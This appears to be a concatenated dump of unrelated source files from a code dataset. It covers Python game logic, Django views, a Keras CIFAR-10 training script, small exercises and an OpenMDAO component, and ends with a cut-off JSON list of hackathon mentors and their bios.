foods = [supply for supply in self.supplies if supply.__class__.__name__ == "FoodSupply"]
if not foods:
raise IndexError("There are no food supplies left!")
return foods
@property
def water(self):
water_objects = [water_obj for water_obj in self.supplies if water_obj.__class__.__name__ == "WaterSupply"]
if not water_objects:
raise IndexError("There are no water supplies left!")
return water_objects
@property
def painkillers(self):
painkillers_objects = [painkiller_obj for painkiller_obj in self.medicine
if painkiller_obj.__class__.__name__ == "Painkiller"]
if not painkillers_objects:
raise IndexError("There are no painkillers left!")
return painkillers_objects
@property
def salves(self):
salve_objects = [salve_obj for salve_obj in self.medicine if salve_obj.__class__.__name__ == "Salve"]
if not salve_objects:
raise IndexError("There are no salves left!")
return salve_objects
def add_survivor(self, survivor):
try:
survivor_name = [s.name for s in self.survivors if s.name == survivor.name][0]
raise IndexError(f"Survivor with name {survivor_name} already exists.")
except IndexError:
self.survivors.append(survivor)
def add_supply(self, supply):
self.supplies.append(supply)
def add_medicine(self, medicine):
self.medicine.append(medicine)
def heal(self, survivor, medicine_type):
healing_medicine = self.painkillers.pop() if medicine_type == "Painkiller" else self.salves.pop()
if survivor.needs_healing:
healing_medicine.apply(survivor)
self.medicine.remove(healing_medicine)
return f"{survivor.name} healed successfully with {medicine_type}"
def sustain(self, survivor, sustenance_type):
supply = self.food.pop() if sustenance_type == "FoodSupply" else self.water.pop()
if survivor.needs_sustenance:
supply.apply(survivor)
self.supplies.remove(supply)
return f"{survivor.name} sustained successfully with {sustenance_type}"
def next_day(self):
for survivor in self.survivors:
survivor.needs -= survivor.age * 2
survivor.sustain(survivor, "FoodSupply")
survivor.sustain(survivor, "WaterSupply") |
991,623 | 99454b0b3f4094356b3584b5d0e6f6a7e6c94539 | from authentification.queries import verify_password
from product.models import Product
from django.shortcuts import render, redirect
from authentification.views import verify_login
from product.queries import retrieve_info, add_product, delete
# Create your views here.
@verify_login
def update_products(request, id):
if request.method == 'GET':
product = retrieve_info(id)
title, big_title = choose_title(id)
return render(request, 'update_products.html', {'product': product, 'title':title, 'big_title':big_title, 'id':id})
elif request.method == 'POST':
product = add_product(request.POST, id)
return redirect('product', id=product.id)
def choose_title(id):
if id == 0:
return "Add Product", "Ajouter un nouveau Produit"
else:
return "Update", "Modifier un Produit"
@verify_login
def product(request, id):
product = retrieve_info(id)
return render(request, 'product.html', {'product': product})
@verify_login
def all_products(request):
all_products = list(Product.objects.all().order_by('id'))
return render(request, 'all_products.html', {'all_products': all_products})
@verify_login
def delete_product(request, id):
delete(id)
return redirect('home') |
991,624 | ac5f7ed805cc41ddfa4e627d24bdebfc1f1ec604 | # -*- coding: utf-8 -*-
from platinumegg.app.cabaret.util.cabareterror import CabaretError
from platinumegg.app.cabaret.util.api import BackendApi
import settings
from platinumegg.app.cabaret.util.url_maker import UrlMaker
from platinumegg.app.cabaret.models.Player import PlayerScout, PlayerAp,\
PlayerExp, PlayerRegist, PlayerFriend, PlayerDeck
from platinumegg.app.cabaret.util.db_util import ModelRequestMgr
from platinumegg.app.cabaret.util import db_util
from platinumegg.app.cabaret.views.application.scout.base import ScoutHandler
import settings_sub
from defines import Defines
from platinumegg.app.cabaret.models.Scout import ScoutPlayData
import urllib
class Handler(ScoutHandler):
"""スカウト実行.
引数:
実行するスカウトID.
"""
@classmethod
def getViewerPlayerClassList(cls):
return []
def redirectWithError(self, err):
if self.is_pc:
raise err
else:
url = self.makeAppLinkUrlRedirect(UrlMaker.scout())
self.appRedirect(url)
def process(self):
try:
# スカウトID.
args = self.getUrlArgs('/scoutdo/')
scoutid = int(args.get(0)) or None
scoutkey = urllib.unquote(args.get(1) or '')
str_flag_skip = self.request.get(Defines.URLQUERY_SKIP)
if not str_flag_skip in ('1', '0'):
str_flag_skip = None
except:
raise CabaretError(u'引数が想定外です', CabaretError.Code.ILLEGAL_ARGS)
v_player = self.getViewerPlayer()
# 演出スキップフラグ.
if str_flag_skip:
flag_skip = bool(int(str_flag_skip))
BackendApi.set_scoutskip_flag(v_player.id, flag_skip)
else:
flag_skip = BackendApi.get_scoutskip_flag(v_player.id)
model_mgr = self.getModelMgr()
using = settings.DB_DEFAULT
# マスターデータ.
scoutmaster = None
if scoutid:
scoutmasterlist = BackendApi.get_scouts(model_mgr, [scoutid], using)
scoutmaster = scoutmasterlist[0] if scoutmasterlist else None
if scoutmaster is None:
raise CabaretError(u'不正なアクセスです', CabaretError.Code.ILLEGAL_ARGS)
areamaster = BackendApi.get_area(model_mgr, scoutmaster.area, using)
if areamaster is None:
self.redirectWithError(CabaretError(u'閲覧できないエリアです', CabaretError.Code.ILLEGAL_ARGS))
return
# 遊べるかを確認.
if not BackendApi.check_scout_playable(model_mgr, scoutmaster, v_player, using):
# クリア条件を満たしていない.
self.redirectWithError(CabaretError(u'閲覧できないエリアです', CabaretError.Code.ILLEGAL_ARGS))
return
if not scoutkey:
scoutkey = BackendApi.get_scoutkey(model_mgr, v_player.id, scoutmaster.id, using)
# SHOWTIME確認.
raideventmaster = BackendApi.get_current_raideventmaster(model_mgr, using=using)
if raideventmaster is None or raideventmaster.flag_dedicated_stage:
champagnecall_start = False
champagnecall = False
else:
champagnecall_start = BackendApi.get_raidevent_is_champagnecall_start(model_mgr, v_player.id, using=using)
champagnecall = not champagnecall_start and BackendApi.get_raidevent_is_champagnecall(model_mgr, v_player.id, using=using)
# 実行.
champagnecall_started = False
try:
model_mgr, playdata = db_util.run_in_transaction(self.tr_write, v_player.id, scoutmaster, scoutkey, champagnecall, champagnecall_start)
model_mgr.write_end()
champagnecall_started = bool(playdata.result.get('champagne'))
except CabaretError, err:
if err.code == CabaretError.Code.ALREADY_RECEIVED:
model_mgr.delete_models_from_cache(ScoutPlayData, [ScoutPlayData.makeID(v_player.id, scoutmaster.id)])
else:
# うまく実行できない.
if settings_sub.IS_DEV:
# マスターデータが正しくないとかあるだろうからそのチェック用.
raise
# ここに来るのは不正アクセス等のユーザという想定.
self.redirectWithError(CabaretError(u'閲覧できないエリアです', CabaretError.Code.ILLEGAL_ARGS))
return
if flag_skip:
url = UrlMaker.scoutresultanim(scoutmaster.id, scoutkey, 0)
else:
url = UrlMaker.scoutanim(scoutmaster.id, scoutkey)
if settings_sub.IS_BENCH:
self.response.end()
else:
if champagnecall_started:
params = BackendApi.make_raidevent_champagnecall_effectparams(self, raideventmaster, url)
if params:
# シャンパン演出へ.
effectpath = 'raidevent/showtime/effect.html'
self.appRedirectToEffect(effectpath, params)
return
self.appRedirect(self.makeAppLinkUrlRedirect(url))
def tr_write(self, uid, scoutmaster, scoutkey, champagnecall, champagnecall_start):
model_mgr = ModelRequestMgr(loginfo=self.addloginfo)
player = BackendApi.get_players(self, [uid], [PlayerAp, PlayerScout, PlayerRegist, PlayerExp, PlayerFriend, PlayerDeck], model_mgr=model_mgr)[0]
playdata = BackendApi.tr_do_scout(model_mgr, player, scoutmaster, scoutkey, champagnecall=champagnecall, champagnecall_start=champagnecall_start)
model_mgr.write_all()
return model_mgr, playdata
def main(request):
return Handler.run(request)
|
991,625 | 4b6df09e6c7f37734dbd2c71e13cb35a8d47ee4a | print("enter num")
num = int(input())
var=0
def fun(num):
var = 0
while num !=0:
num=num // 10
var = var+1
return var
print(fun(num))
|
991,626 | 21d7d1197b99a3747b2057e11b4f53a94b397dbc | # Przekopiuj zawartość import this do zmiennej.
a = """The Zen of Python, by Tim Peters
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!"""
# Policz liczbę wystąpień słowa better.
word = 'better'
print(word, 'występuje w tekście:', a.count("better"), 'razy')
# Usuń z tekstu symbol gwiazdki
symbol = '*'
a_n = a.replace('*', '')
# print(a_n)
# Zamień jedno wystąpienie explain na understand
print(a.count('explain'))
a_n2 = a.replace('explain', 'understand', 1)
print(a_n2.count('explain'))
# print(a_n2)
# Usuń spacje i połącz wszystkie słowa myślnikiem
a_n3 = a.replace(' ', '-')
# print(a_n3)
# Podziel tekst na osobne zdania za pomocą kropki
# poprawić używając split
n4_a = a.replace(' ', '.')
print(n4_a) |
991,627 | bf48143548db120c645772df2e2f998ed210076c | # https://leetcode.com/problems/find-positive-integer-solution-for-a-given-equation/
class Solution(object):
def findSolution(self, customfunction, z):
seen = set()
res = []
def g(x, y):
if (x, y) not in seen:
seen.add((x, y))
v = customfunction.f(x, y)
if v == z:
res.append([x, y])
elif v < z:
g(x + 1, y)
g(x, y + 1)
g(1, 1)
return res
|
991,628 | ac29ffc3b933c6bd2090cea6dbf6ba0ccb8ad54f | #doCalc()
# APDataArray[
# AP[
# <Latitude(+- deg)>
# <Longitude(+- deg)>
# <Altitude(ft)>
# <DistanceToAP(ratio)>
# ]
# ... (4x APs min)
# ]
import triangulation
t = triangulation.triangulation()
data = []
AP1 = []
AP1.append(46.717108333333300 ) # Latitude
AP1.append(-116.971675000000000 ) # Longitude
AP1.append(2591) # Altitude
AP1.append(708.04) # Distance
data.append(AP1)
AP2 = []
AP2.append(46.716822222222200 )
AP2.append(-116.973625000000000 )
AP2.append(2585)
AP2.append(712.57)
data.append(AP2)
AP3 = []
AP3.append(46.717166666666700 )
AP3.append(-116.975325000000000 )
AP3.append(2586)
AP3.append(790.18)
data.append(AP3)
AP4 = []
AP4.append(46.718202777777800 )
AP4.append(-116.974725000000000 )
AP4.append(2598)
AP4.append(438.13)
data.append(AP4)
res = t.doCalc(data)
t.printObj(res)
t.printObj(data)
#t.rotatePointAboutOrigin(10, 0, 75);
#t.rotatePointAboutOrigin(10, 10, 90);
#t.rotatePointAboutOrigin(0, 10, 90);
#t.rotatePointAboutOrigin(-10, 10, 90);
#t.rotatePointAboutOrigin(-10, 0, 90);
#t.rotatePointAboutOrigin(-10, -10, 90);
#t.rotatePointAboutOrigin(0, -10, 90);
#t.rotatePointAboutOrigin(10, -10, 90);
|
991,629 | ee14b4e528f7ca848ca45be3e3eeedc62b2c79ba |
frequency_colors = {'01': '#77C000', '06': '#ee188d', '10': '#03aa87', '19': '#f46817', '37': "#7b7bc6", '89': '#ee188d'}
|
991,630 | 358af60f9a9e5ff455bb4464ef1a6fb3db87e566 | # Loads Cifar10. and fits a simple cnn. Uses a custom_loss
# Custom loss has been DIY softmax loss (cross entropy) so can verify with original
import numpy as np
# import matplotlib.pyplot as plt
# import tensorflow as tf
import keras
from keras import backend as K
import code
import time
import cv2
import math
# import matplotlib.pyplot as plt
from viz_utils import labels_to_logits
def custom_loss( y_true, y_pred ):
# def custom_loss( params ):
# y_true, y_pred = params
# pass
# code.interact( local=locals() )
u = -K.sum( y_true * K.log(y_pred+1E-6), -1 ) # This is the defination of cross-entropy. basically softmax's log multiply by target
return K.maximum( 0., u )
if False: # Play with custom_loss
y_true = keras.layers.Input( shape=(10,) )
y_pred = keras.layers.Input( shape=(10,) )
# u = custom_loss( y_true, y_pred )
u = keras.layers.Lambda(custom_loss)( [y_true, y_pred] )
model = keras.models.Model( inputs=[y_true,y_pred], outputs=u )
model.summary()
keras.utils.plot_model( model, show_shapes=True )
a = np.zeros( (2,10) )
a[0,1] = 1
a[1,9] = 1
b = np.zeros( (2,10) ) #np.random.randint( 10, size=(2,10) )
b[0,4] = 0.05; b[0,1] = 0.95
b[1,8] = 1
out = model.predict( [ a,b ])
quit()
#-----------------------------------------------------------------------------
# Data
cifar10 = keras.datasets.cifar10
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
#x_train: 50K x 32x32x3
#y_train: 50K x 1
#-----------------------------------------------------------------------------
# Model
model = keras.Sequential()
model.add( keras.layers.Conv2D(32, (3,3), activation='relu', padding='same', input_shape=(32,32,3) ) )
model.add( keras.layers.Conv2D(32, (3,3), activation='relu', padding='same' ) )
model.add( keras.layers.MaxPooling2D(pool_size=(2,2)) )
model.add( keras.layers.Conv2D(64, (3,3), activation='relu', padding='same', input_shape=(32,32,1) ) )
model.add( keras.layers.Conv2D(64, (3,3), activation='relu', padding='same' ) )
model.add( keras.layers.MaxPooling2D(pool_size=(2,2)) )
model.add( keras.layers.Conv2D(128, (3,3), activation='relu', padding='same', input_shape=(32,32,1) ) )
model.add( keras.layers.Conv2D(128, (3,3), activation='relu', padding='same' ) )
model.add( keras.layers.MaxPooling2D(pool_size=(2,2)) )
model.add( keras.layers.Flatten() )
model.add( keras.layers.Dense(128, activation='relu'))
model.add( keras.layers.Dense(10, activation='softmax'))
model.summary()
keras.utils.plot_model( model, show_shapes=True )
#-----------------------------------------------------------------------------
# Compile
# optimizer = tf.keras.optimizers.Adam(lr=1e-5)
optimizer = keras.optimizers.RMSprop(lr=1e-4)
model.compile(optimizer=optimizer,
# loss='categorical_crossentropy',
loss=custom_loss,
metrics=['accuracy'])
model.fit( x=x_train, y=labels_to_logits( y_train ),
epochs=5, batch_size=32, verbose=1, validation_split=0.1 )
model.save( 'cifar10_cnn_customloss.keras' )
#
# #----------------------------------------------------------------------------
# # Iterations
# if True: # Simple 1 shot
#
# tb = tf.keras.callbacks.TensorBoard( log_dir='cifar10_cnn.logs', histogram_freq=1, write_grads=True, write_images=True )
#
# history = model.fit(x=x_train.reshape( x_train.shape[0], x_train.shape[1], x_train.shape[2], 3),
# y=labels_to_logits(y_train),
# epochs=5, batch_size=128, verbose=1,
# callbacks=[tb], validation_split=0.1)
# print 'save learned model'
# model.save( 'cifar10_cnn.keras' )
# code.interact( local=locals() )
#
#
# if False: #
# x_train_1 = x_train[ 0:25000, :, : , : ]
# y_train_1 = y_train[ 0:25000, : ]
# x_train_2 = x_train[ 25000:, :, : , : ]
# y_train_2 = y_train[ 25000:, : ]
#
# model.fit(x=x_train_1,
# y=labels_to_logits(y_train_1),
# epochs=10, batch_size=128, verbose=2)
#
# model.fit(x=x_train_2,
# y=labels_to_logits(y_train_2),
# epochs=10, batch_size=128, verbose=2)
#
# print 'save learned model'
# model.save( 'cifar10_cnn.keras' )
#
#
# if False:
# print 'load pretrained model'
# model.load_weights( 'cifar10_cnn.keras' )
#
#
# #---------------------------------------------------------------------------
# # Evaluate
# score = model.evaluate( x_test, labels_to_logits(y_test), verbose=1 )
# print 'Test Loss: ', score[0]
# print 'Accuracy : ', score[1]
#
#
#
# #---------------------------------------------------------------------------
# # Predict
# for _ in range(30):
# r = np.random.randint( x_test.shape[0] )
# pred_outs = model.predict( x_test[r:r+1,:,:,:] )
# print 'r=', r
# print 'predicted = ', pred_outs.argmax(),
# print 'ground truth = ', y_test[r],
# print ''
# cv2.imshow( 'test image', x_test[r,:,:,:].astype('uint8') )
# cv2.waitKey(0)
|
991,631 | 0c6382d308a89bf74d114ba8ef73e9cd429162e1 | from Comentario import Comentario
import unicodedata
import json
#DEFINIMOS LA CLASE JUEGO
class Juego:
#CONSTRUCTOR DE JUEGO
def __init__ (self,id,nombre,anio,precio,categoria1,categoria2,categoria3,foto,banner,descripcion):
self.id = id
self.nombre = nombre
self.anio = anio
self.precio = precio
self.categoria1 = categoria1
self.categoria2 = categoria2
self.categoria3 = categoria3
self.foto = foto
self.banner = banner
self.descripcion = descripcion
self.comentarios = []
#modifica los datos del juego, excepto comentarios
def modificar_Juego(self,nombre,anio,precio,categoria1,categoria2,categoria3,foto,banner,descripcion):
self.nombre = nombre
self.anio = anio
self.precio = precio
self.categoria1 = categoria1
self.categoria2 = categoria2
self.categoria3 = categoria3
self.foto = foto
self.banner = banner
self.descripcion = descripcion
#agrega un comentario a la lista de comentarios
def agregar_Comentario(self,cadena,UserName,fecha):
self.comentarios.append(Comentario(cadena,UserName,fecha))
#devuelve el id del juego si coincide alguna categoria
def comprobar_categoria(self,valor):
if unicodedata.normalize('NFKD', self.categoria1).encode('ASCII', 'ignore').strip().lower() == unicodedata.normalize('NFKD', valor).encode('ASCII', 'ignore').strip().lower():
if self.categoria1 != "":
return self.id
if unicodedata.normalize('NFKD', self.categoria2).encode('ASCII', 'ignore').strip().lower() == unicodedata.normalize('NFKD', valor).encode('ASCII', 'ignore').strip().lower():
if self.categoria2 != "":
return self.id
if unicodedata.normalize('NFKD', self.categoria3).encode('ASCII', 'ignore').strip().lower() == unicodedata.normalize('NFKD', valor).encode('ASCII', 'ignore').strip().lower():
if self.categoria3 != "":
return self.id
return False
#devuelve TODOS los comentarios de un juego en formato json
def devolver_comentarios(self):
return json.dumps([comentario.dump() for comentario in self.comentarios])
#muestra el usuario en formato json
def dump(self):
return{
'id': self.id,
'nombre': self.nombre,
'año': self.anio,
'precio': self.precio,
'categoria1': self.categoria1,
'categoria2': self.categoria2,
'categoria3': self.categoria3,
'foto' : self.foto,
'banner' : self.banner,
'descripcion' : self.descripcion
} |
991,632 | 712c89b34ac831954498a5e71f1ec68a50b5379c | from openmdao.api import ExplicitComponent
import numpy as np
from input_params import max_n_turbines
class AbstractThrustCoefficient(ExplicitComponent):
def __init__(self, number, n_cases):
super(AbstractThrustCoefficient, self).__init__()
self.number = number
self.n_cases = n_cases
def setup(self):
self.add_input('n_turbines', val=0)
self.add_input('prev_ct', shape=(self.n_cases, max_n_turbines - 1))
for n in range(max_n_turbines):
if n < self.number:
self.add_input('U{}'.format(n), shape=self.n_cases)
self.add_output('ct', shape=(self.n_cases, max_n_turbines - 1))
# Finite difference all partials.
# self.declare_partials('*', '*', method='fd')
def compute(self, inputs, outputs):
# print "2 Thrust"
# for n in range(max_n_turbines):
# if n != self.number:
# print inputs['U{}'.format(n)], "Input U{}".format(n)
ans = np.array([])
for case in range(self.n_cases):
n_turbines = int(inputs['n_turbines'])
c_t = np.array([])
prev_ct = inputs['prev_ct'][case]
for n in range(n_turbines):
if n < self.number < n_turbines:
if n == self.number - 1:
print "called ct_model"
c_t = np.append(c_t, [self.ct_model(inputs['U{}'.format(n)][case])])
else:
c_t = np.append(c_t, [prev_ct[n]])
lendif = max_n_turbines - len(c_t) - 1
# print c_t
c_t = np.concatenate((c_t, [0 for _ in range(lendif)]))
ans = np.append(ans, c_t)
ans = ans.reshape(self.n_cases, max_n_turbines - 1)
# print ans
outputs['ct'] = ans
# print ans, "Output Ct"
if __name__ == '__main__':
from openmdao.api import Problem, Group, IndepVarComp
model = Group()
ivc = IndepVarComp()
ivc.add_output('u', 7.0)
model.add_subsystem('indep', ivc)
model.connect('indep.u', 'thrust.u')
prob = Problem(model)
prob.setup()
prob.run_model()
print(prob['thrust.Ct'])
|
991,633 | f72c14c25f6f7954663b449b2af74ca3216ec458 | [{"id":76,"name":"Анна-Мария Ангелова","description":"<p>Анна-Мария Ангелова е завършила Американския университет в България, където именно се запалва искрата към анализирането на данните и предприемачеството. През последните 5 г. тя взима участие в няколко проекта за иновации в Исландия и Дания, работи за един стартъп и активно се ангажира с разработването и реализирането на някои от най-обещаващите хъбове на Балканите, сред които организирането на световните форуми StartUP конференция, StartUP Weekend в България и AdventureNEXT в Македония.</p>\r\n\r\n<p>По време на следването си Анна-Мария работи по няколко Big Data проекта. В Experian тя се занимава с моделиране на данни, като фокусът е върху разрешаването на проблеми, свързани с стратегически маркетинг и управление на риска.</p>","picture":"./Anna-Maria_Angelova.jpg","teams":[{"id":268,"name":"Линейно Сортиране","room":"321"},{"id":266,"name":"Kappa","room":"100"},{"id":273,"name":"Д3В Machines","room":"307"},{"id":263,"name":"#WhatHacKeriWillSay","room":"1"},{"id":281,"name":"Pestering Petabytes","room":"304"},{"id":279,"name":"HackFMI Dream Team","room":"305"}]},{"id":77,"name":"Мартин Йотов","description":"<p>Мартин Йотов вече 2 години работи в Experian, в отдела Regional Analytics Group. Притежава бакалавърска степен по Финанси и магистърска по Банково дело и международни финанси от Университетът за национално и световно стопанство.</p>\r\n\r\n<p>Силата му е в скриптиране, решаване на проблеми и управление на времето. Ако имате проблем, който може да се реши дедуктивно или индуктивно и чрез креативно мислене, той може да ви бъде от голяма полза.</p>","picture":"./Martin_Yotov.jpg","teams":[{"id":266,"name":"Kappa","room":"100"}]},{"id":78,"name":"Владимир Алексиев","description":"<p>Владимир Алексиев е съосновател и CTO на Perpetto.</p>\r\n\r\n<p>Perpetto e 3-тата компания, която Владо стартира и в последните близо 3 години е напълно отдаден на нея. Работата му е свързана основно със събиране и анализиране на данни.</p>\r\n\r\n<p>Владо ще може да ви помогне с:</p>\r\n\r\n<ul>\r\n\t<li>Ruby / Rails</li>\r\n\t<li>PHP</li>\r\n\t<li>Programming languages in general</li>\r\n\t<li>Algorithms</li>\r\n\t<li>Database design</li>\r\n\t<li>Architecture</li>\r\n\t<li>How to turn your idea into business</li>\r\n\t<li>Presentation skills</li>\r\n</ul>","picture":"./vlad_1.jpg","teams":[{"id":277,"name":"Далеци'","room":"326"},{"id":274,"name":"Племето","room":"321"},{"id":260,"name":"counter productive unit","room":"308"},{"id":262,"name":"#RoboLove","room":"307"},{"id":265,"name":"OK, Hacker","room":"305"},{"id":280,"name":"2b|!2b","room":"02"}]},{"id":79,"name":"Явор Стойчев","description":"<p>Явор Стойчев е софтуерен архитект и съосновател на Perpetto. Преди това е бил софтуерен инженер в Amazon и Transmetrics.</p>\r\n\r\n<p>Явор може да ви помогне с:</p>\r\n\r\n<ul>\r\n\t<li>Distributed Systems & Big Data - Spark, Hadoop, Hbase, Elasticsearch</li>\r\n\t<li>Machine Learning</li>\r\n\t<li>Java, Scala</li>\r\n\t<li>Ruby on Rails</li>\r\n\t<li>Python</li>\r\n\t<li>Designing Systems for Failure</li>\r\n\t<li>Design Patterns</li>\r\n</ul>","picture":"./yavor_1.jpg","teams":[{"id":262,"name":"#RoboLove","room":"307"},{"id":265,"name":"OK, Hacker","room":"305"},{"id":279,"name":"HackFMI Dream Team","room":"305"},{"id":278,"name":"Дзверозаври","room":"mazata"}]},{"id":80,"name":"Атанас Благоев","description":"<p>Само на 25 г., но вече успял за прекара последните 7 години в иновационни хъбове като Амстердам и Лондон, Атанас Благоев ще допринесе за вашия отбор с дълбоки познания в сферата на маркетинга и опит в тяхното прилагане.</p>\r\n\r\n<p>В момента Атанас е Junior Data Modeler в Experian, където придобива знания за пазара на продукти, които са задвижвани от данни. </p>","picture":"./Atanas_Blagoev.jpg","teams":[{"id":279,"name":"HackFMI Dream Team","room":"305"}]},{"id":81,"name":"Павел Калоферов","description":"<p>Павел е участвал на 2 хакатона в Англия – единият път е бил част от отбора-победител, а другият е бил на трето място. В момента Павел работи като Junior Data Modeler в Experian, което е и ясен сигнал за неговите интереси в областта на данните.</p>\r\n\r\n<p>Освен това, той е съосновател на стартъп, който в момента оперира на пазара. Така че, в лицето на Павел ще откриете човек, който познава трудностите в развиването на нова идея и който ще може да ви даде нетривиални съвети как да бъдете по-ефикасни.</p>","picture":"./Pavel_Kaloferov.jpg","teams":[]},{"id":82,"name":"Георги Стоянов","description":"<p>Георги е основател на Lucid - приложение, базирано на machine learning алгоритми, които рендерират снимката ви в картина като от известни художници. Има опит с програмиране, алгоритми, data structures, machine learning, business development и не само. Работил е в Google, Microsoft и Uber.</p>\r\n\r\n<p>Може да помага за:</p>\r\n\r\n<ul>\r\n\t<li>Javascript,Python, Java</li>\r\n\t<li>Programming languages in general</li>\r\n\t<li>Algorithms</li>\r\n\t<li>Datastructures</li>\r\n\t<li>Architecture</li>\r\n\t<li>Тensorflow, Scikit, Scrapers & Machine learning</li>\r\n\t<li>How to turn your idea into business</li>\r\n\t<li>Presentation skills</li>\r\n</ul>","picture":"./george_stoyanov.jpg","teams":[{"id":268,"name":"Линейно Сортиране","room":"321"},{"id":266,"name":"Kappa","room":"100"},{"id":274,"name":"Племето","room":"321"},{"id":272,"name":"Asteria","room":"307"},{"id":273,"name":"Д3В Machines","room":"307"},{"id":265,"name":"OK, Hacker","room":"305"},{"id":263,"name":"#WhatHacKeriWillSay","room":"1"},{"id":280,"name":"2b|!2b","room":"02"},{"id":281,"name":"Pestering Petabytes","room":"304"},{"id":279,"name":"HackFMI Dream Team","room":"305"},{"id":278,"name":"Дзверозаври","room":"mazata"}]},{"id":83,"name":"Антон Ненов","description":"<p>Антон е Data Scientist в NetInfo и част от общността - Data Science Society. Може да ви помага с различни Data Mining техники - Classification Trees(C 5.0, CHAID...), Clustering (K-means), Time Series (ARIMA), Market Basket(Apriori), Social network Analysis (SNA).</p>\r\n\r\n<p>Има опит с продукти като:</p>\r\n\r\n<ul>\r\n\t<li>SPSS Modeler (old name Clementine)</li>\r\n\t<li>R (R studio)</li>\r\n\t<li>Orange (<a href=\"http://orange.biolab.si/\" target=\"_blank\">http://orange.biolab.si/</a>)</li>\r\n\t<li>Google Analytics и Тableau</li>\r\n</ul>","picture":"./anton_nenov.jpg","teams":[{"id":268,"name":"Линейно Сортиране","room":"321"},{"id":265,"name":"OK, Hacker","room":"305"},{"id":283,"name":"Algosquad","room":"2"}]},{"id":84,"name":"Михаил Жеков","description":"<p>Михаил е SAP Mobile Developer в Sqilline.</p>\r\n\r\n<p>Той може да помага за:</p>\r\n\r\n<ul>\r\n\t<li>Java</li>\r\n\t<li>C/C++</li>\r\n\t<li>Programming languages in general</li>\r\n\t<li>Algorithms</li>\r\n\t<li>Architecture</li>\r\n</ul>","picture":"./Mihail_Jekov.jpg","teams":[{"id":268,"name":"Линейно Сортиране","room":"321"},{"id":263,"name":"#WhatHacKeriWillSay","room":"1"}]},{"id":85,"name":"Веселин Истатков","description":"<p>Веско е Technical Team Leader Sqilline, завършил ФМИ, има опит с множество проекти като Developer, Software Architect и Project Manager.</p>\r\n\r\n<p>Може да ви бъде полезен с:</p>\r\n\r\n<ul>\r\n\t<li>как да превърнете идеята си в готов продукт за представяне;</li>\r\n\t<li>множество технологии и езици за програмиране;</li>\r\n\t<li>алгоритми;</li>\r\n\t<li>презентационни умения;</li>\r\n\t<li>управление на обхвата и времето на проекта.</li>\r\n</ul>","picture":"./Vesko-sqilline.jpg","teams":[{"id":263,"name":"#WhatHacKeriWillSay","room":"1"}]},{"id":87,"name":"Десислава Василева","description":"<p>Десислава е Senior Data Modeler в Experian. Има над 5-години опит в сферата като през последните 3 години е част от екипа на Experian. Освен това, в момента учи Статистика, иконометрия и актюерство в Софийския университет.</p>\r\n\r\n<p>По време на следването си за бакалавърска степен учи и в университети Metropolitan University Prague и University of Wisconsin – Eau Claire. </p>","picture":"./DesislavaVasileva_Picture.jpg","teams":[{"id":278,"name":"Дзверозаври","room":"mazata"},{"id":283,"name":"Algosquad","room":"2"}]},{"id":88,"name":"Павел Геневски","description":"<p>Павел е Senior Researcher в SAP Labs Bulgaria.</p>\r\n\r\n<p>Той може да помогне на вашия отбор с:</p>\r\n\r\n<ul>\r\n\t<li>Развиване на идеята, product research, разработка, UX, презентационни умения</li>\r\n\t<li>Frontend: HTML/CSS/JavaScript, Twitter bootstrap, reactjs, gulp, karma, jasmine, Android</li>\r\n\t<li>Backends: NodeJS, Java, PHP, nginx, Tomcat, SQL, PostgreSQL, Linux, Docker, Security</li>\r\n\t<li>(Big)Data science: Spark, Hive, Kafka, Cassandra, Zeppelin, SQL, R, Information Retrieval, NLTK, Bash, awk/grep</li>\r\n</ul>","picture":"./image003.jpg","teams":[{"id":273,"name":"Д3В Machines","room":"307"},{"id":266,"name":"Kappa","room":"100"}]},{"id":89,"name":"Добромир Захариев","description":"<p>Добромир е<strong> </strong>Senior Developer and Product Owner в SAP Labs Bulgaria.</p>\r\n\r\n<p>Той може да помогне с:</p>\r\n\r\n<ul>\r\n\t<li>Development and architecture - always curious about best practices and code excellence.<br />\r\n\tEnjoys dynamic programming and optimization algorithms.</li>\r\n\t<li>Recently used languages – от Java до Swift, Objective-C и bash</li>\r\n\t<li>Experiments with virtualization – VirtualBox и Monsoon </li>\r\n</ul>","picture":"./dobromir-zahariev.jpg","teams":[]},{"id":90,"name":"Божидар Божанов","description":"<p>Божидар е софтуерен инженер и архитект с 10 години опит, основно Java-технологии. В момента съветник по въпросите на електронното управление на вицепремиера, с фокус върху архитектурата на електронното управление и отворените данни.</p>\r\n\r\n<p>Може да помага за:</p>\r\n\r\n<ul>\r\n\t<li>Намиране на подходящи данни</li>\r\n\t<li>Работа с данни (изчистване, моделиране, оптимизиране)</li>\r\n\t<li>Общи програмистки насоки, избор на инструменти</li>\r\n</ul>","picture":"./bozhidar_bozhanov.jpg","teams":[{"id":277,"name":"Далеци'","room":"326"},{"id":268,"name":"Линейно Сортиране","room":"321"},{"id":273,"name":"Д3В Machines","room":"307"},{"id":280,"name":"2b|!2b","room":"02"},{"id":278,"name":"Дзверозаври","room":"mazata"},{"id":283,"name":"Algosquad","room":"2"}]},{"id":91,"name":"Георги Къдрев","description":"<p>Като ученик и студент Георги е лауреат на множество състезания по програмиране и информационни технолигии.<br />\r\nСлед като завършва бакалавърската си степен основава Imagga, технологична копмания прилагаща машинно самообучение за целите на разпознаване на обекти и сцени в цифрови снимки. Технологията се предлага под формата на програмен интерфейс (API), който разработчиците могат да вграждат в приложенията си работещи със снимки. Копманията е носител на множество национални, регионални и световни отличия, включително и "Глобален иноватор в областта на анализ на изображения" за 2016 г.</p>\r\n\r\n<p><br />\r\nГеорги може да бъде полезен с:</p>\r\n\r\n<ul>\r\n\t<li>Практически опит в областта на машинното самобучение и анализ на изображения</li>\r\n\t<li>Съвети за оформянето на бизнес концепция базирана на технологии</li>\r\n</ul>","picture":"./Georgi-Kadrev-big-face.jpg","teams":[{"id":268,"name":"Линейно Сортиране","room":"321"},{"id":274,"name":"Племето","room":"321"},{"id":272,"name":"Asteria","room":"307"},{"id":265,"name":"OK, 